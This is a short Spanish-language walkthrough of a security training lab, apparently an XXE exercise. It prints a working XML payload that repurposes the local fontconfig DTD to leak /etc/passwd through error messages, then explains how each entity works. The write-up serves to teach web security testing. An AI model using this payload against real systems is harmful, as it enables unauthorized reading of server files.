<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">
<!ENTITY % expr 'aaa)>
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>">
%eval;
%error;
<!ELEMENT aa (bb'>
%local_dtd;
]>
Encontramos este exploit de un DTD llamado fonts.dtd, que nos aparecía como existente en la lista que hicimos, por lo que debe funcionar, y lo que hace esto es primero crea la entidad file que contiene el contenido del archivo /etc/passwd, después se crea una entidad llamada eval y dentro de esta entidad se define otra entidad llamada error, que lo que hará esta entidad será escribir un archivo de respuesta de error en la ruta abcxyz la cual no existe y provocara el error, por último llamamos a las entidades, y como en medio del error llamamos a la entidad file, y estos errores se están devolviendo, entonces lógicamente obtendremos la respuesta del archivo /etc/passwd en el mensaje de error, completando así nuestro objetivo.
Y por último, al tramitar la petición veremos que nos responde el archivo /etc/passwd:
Y ya habremos resuelto este último laboratorio: